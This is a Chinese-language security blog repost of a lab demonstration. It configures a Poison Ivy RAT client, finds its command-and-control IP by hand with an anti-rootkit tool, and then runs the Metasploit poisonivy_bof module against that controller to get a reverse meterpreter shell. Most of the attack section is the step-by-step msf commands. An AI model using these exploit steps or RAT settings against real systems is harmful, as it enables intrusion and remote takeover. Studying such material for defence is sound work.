请选择 进入手机版 | 继续访问电脑版
  • 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

PoisonIvy Rat 远程溢出实战

原作者: [db:作者] 来自: [db:来源] 收藏 邀请
From&thx2:
http://badishi.com/poison-ivy-exploit-metasploit-module/
https://twitter.com/badishi
这个Exploit已经集成在最新版本的Msf中了,老外的文章里也有源文件,可以修改后单独提出来.
 
首先为了模拟完整的环境,第一步是抓到已经成为肉鸡的电脑上反向连接的IP,这里顺便介绍下简单ARK工具的使用及手工查马的方法吧.
PI的反向连接配置,这里填的静态IP

启动项及释放目录等,同时设定的插默认浏览器和svchost.exe.

完整的配置信息如下:
- Connection
Connect to: 92.168.124.134:3460:0,
ID: test
Group:
Password: admin
Connect through proxy: No
- Install
ActiveX Startup: Yes
ActiveX Key: {344D13DD-52AF-DD3F-2A33-ED4792414430}
Copy File: Yes
File Name: svchost.exe
Copy File To: System Folder
Melt File: Yes
- Advanced
Process Mutex: )!VoqA.I4
Inject Server: Yes
Persistence: No
Inject into running process: Yes
Inject into: svchost.exe
Key Logger: No
Format: PE
File Alignment: 512
- Build
Icon: No
Execute Third-party Applications: No
在DEMO机器中运行,然后上线了.

DEMO机器中手工用Xuetr查杀,手工查杀木马的方法,对于Ring3层下的无非就是可疑进程,可疑连接,可疑DLL模块,可疑启动项(服务),等等这些了.这里直接参考建立的网络连接.都能看到这里并没有打开IE却有了IE的进程,并且是已经连接的状态了.于是得到C&C的IP地址.

 
请出Msf黑火星的神器.

msf>search poisonivy
找到exp位置
msf>use /exploit/windows/misc/poisonivy_bof
设定使用exp
msf>show options
查看下设定,只要设定下远程IP(C&C服务器)地址就可以了.
msf>set RHOST 192.168.124.134
检查下是否存在漏洞
msf>check
ok.. just exploit it!
msf>exploit
默认会返回一个反连的meterpreter会话.

最后.测试了下全补丁版本的Windows 2k3 enterprise,可能因为DEP和ALSR技术的原因,没有完全bypass具体的原因没有深入下去了.


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
PHP木马大全 一句话的PHP木马的防范发布时间:2022-02-06
下一篇:
分享PHP场景中getshell防御思路发布时间:2022-02-06
热门推荐
热门话题
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap